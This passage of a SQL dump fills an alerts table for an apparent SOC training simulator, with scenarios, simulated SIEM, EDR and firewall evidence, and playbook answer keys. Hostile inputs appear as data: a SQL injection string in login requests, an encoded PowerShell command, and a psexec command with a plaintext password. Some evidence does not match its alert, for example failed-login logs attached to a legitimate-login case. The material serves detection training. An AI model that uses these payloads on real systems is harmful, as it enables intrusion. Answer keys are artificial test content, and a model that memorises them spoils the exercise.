203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:13:09Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.295Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:13:09Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.295Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:13:09Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.295Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:13:09Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"}],\"query\":\"index=main 
source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(652, 'Brute Force Attack on RDP Detected', 'medium', 'Splunk', 'Multiple failed login attempts detected on the RDP service, indicating a potential brute force attack.', 'Credential Attack', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T07:30:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.101\",\"dst_ip\":\"192.168.1.20\",\"username\":\"admin\",\"hostname\":\"server-01\",\"failed_attempts\":25}', '2026-01-10 09:48:45', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Common administrative username\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP is involved in multiple brute force campaigns, attempting to compromise admin accounts.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.296Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:31:22.296Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 
[Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:30:22.296Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:29:22.296Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:28:22.296Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-01\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(653, 'Malware Execution via Suspicious EXE', 'critical', 'EDR', 'A suspicious executable was detected running on the endpoint, showing signs of malware infection and potential data exfiltration.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T13:22:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"\",\"username\":\"awilliams\",\"hostname\":\"laptop-02\",\"command_line\":\"C:\\\\malicious.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-11 11:03:21', '2026-02-16 18:02:24', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a known ransomware variant\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable exhibits behavior typical of ransomware\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of infected host\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The executable hash is linked to ransomware, requiring immediate isolation and investigation.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(654, 'Lateral Movement Detected via PSExec', 'high', 'SIEM', 'Suspicious lateral movement detected using PSExec from an internal IP, indicating possible unauthorized access.', 'Lateral Movement', 'T1569', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T02:50:37Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.168.1.30\",\"username\":\"administrator\",\"hostname\":\"server-02\",\"command_line\":\"psexec.exe \\\\\\\\192.168.1.30 -u administrator -p password cmd\"}', '2026-01-11 12:58:57', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Source IP for lateral movement within network\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\192.168.1.30 -u administrator -p password cmd\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"PSExec used in unauthorized lateral movement attempts\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Target IP for unauthorized access attempt\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PSExec was used for lateral movement within the network, indicating potential unauthorized access.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.298Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:50:37Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"server-02\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.30 -u administrator -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.298Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:50:37Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"server-02\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.30 -u administrator -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.298Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:50:37Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"server-02\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.30 -u administrator -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.298Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:50:37Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"server-02\\\",\\\"command_line\\\":\\\"psexec.exe 
\\\\\\\\\\\\\\\\192.168.1.30 -u administrator -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.298Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:50:37Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"server-02\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.30 -u administrator -p password cmd\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(655, 'Potential Data Exfiltration via FTP', 'high', 'Firewall', 'Unusual FTP traffic was detected, indicating possible unauthorized data transfer to an external IP.', 'Data Exfiltration', 'T1048', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T12:00:22Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.40\",\"dst_ip\":\"203.0.113.77\",\"username\":\"backupuser\",\"hostname\":\"backup-server\",\"domain\":\"ftp.example.com\"}', '2026-01-10 06:59:49', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP involved in suspicious FTP traffic\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"ftp.example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Legitimate FTP domain with no known issues\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.40\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the backup server\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP is involved in suspicious FTP traffic, suggesting potential data exfiltration.\"}', 'Intermediate', 'NDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(656, 'DNS Tunneling Activity Detected', 'medium', 'IDS', 'Unusual DNS queries detected, possibly indicating DNS tunneling for data exfiltration or command and control.', 'Data Exfiltration', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T03:15:14Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"198.51.100.88\",\"username\":\"\",\"hostname\":\"\",\"domain\":\"suspicious-dns.example.com\"}', '2026-01-10 21:24:29', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"suspicious-dns.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain used for DNS tunneling and data exfiltration\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"IP associated with suspicious DNS traffic\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in DNS tunneling activity\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The DNS queries to this domain are indicative of tunneling activity for data exfiltration.\"}', 'Intermediate', 'NDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.301Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:15:14Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"198.51.100.88\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"domain\\\":\\\"suspicious-dns.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.301Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:15:14Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"198.51.100.88\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"domain\\\":\\\"suspicious-dns.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.301Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:15:14Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"198.51.100.88\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"domain\\\":\\\"suspicious-dns.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.301Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:15:14Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"198.51.100.88\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"domain\\\":\\\"suspicious-dns.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.301Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:15:14Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"198.51.100.88\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"domain\\\":\\\"suspicious-dns.example.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(657, 'False Positive: Legitimate Software Update', 'low', 'EDR', 'A software update process was flagged as suspicious but verified to be a legitimate update from a trusted source.', 'Malware', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T04:22:33Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.60\",\"dst_ip\":\"\",\"username\":\"bsmith\",\"hostname\":\"laptop-03\",\"command_line\":\"C:\\\\Program Files\\\\Updater\\\\update.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-11 06:52:04', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash matches a known legitimate software update\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\Program Files\\\\Updater\\\\update.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Legitimate update process\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process was flagged due to unusual execution patterns but verified as a legitimate update.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(658, 'False Positive: Unusual Login Time', 'medium', 'SIEM', 'A login event occurred at an unusual time for the user, but investigation revealed it was a legitimate access.', 'Credential Attack', 'T1078', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-11T05:10:10Z\",\"event_type\":\"login_success\",\"src_ip\":\"192.168.1.70\",\"dst_ip\":\"\",\"username\":\"mjohnson\",\"hostname\":\"workstation-04\",\"failed_attempts\":0}', '2026-01-11 03:18:55', '2026-02-16 05:12:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.70\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"mjohnson\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Employee account\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login was initially flagged due to the time but was confirmed as legitimate after user verification.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.303Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T05:10:10Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"workstation-04\\\",\\\"failed_attempts\\\":0}\"},{\"timestamp\":\"2026-02-01T20:31:22.303Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T05:10:10Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"workstation-04\\\",\\\"failed_attempts\\\":0}\"},{\"timestamp\":\"2026-02-01T20:30:22.303Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T05:10:10Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"workstation-04\\\",\\\"failed_attempts\\\":0}\"},{\"timestamp\":\"2026-02-01T20:29:22.303Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T05:10:10Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"workstation-04\\\",\\\"failed_attempts\\\":0}\"},{\"timestamp\":\"2026-02-01T20:28:22.303Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T05:10:10Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"workstation-04\\\",\\\"failed_attempts\\\":0}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(659, 'False Positive: High Volume Web Traffic', 'low', 'Firewall', 'An alert was triggered for high volume web traffic, which was determined to be legitimate business activity.', 'Web Attack', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T06:45:50Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.80\",\"dst_ip\":\"203.0.113.200\",\"username\":\"\",\"hostname\":\"\",\"domain\":\"business-partner.com\"}', '2026-01-09 15:07:34', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Trusted partner domain with no security issues\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.80\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of a business unit\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"business-partner.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Legitimate business partner 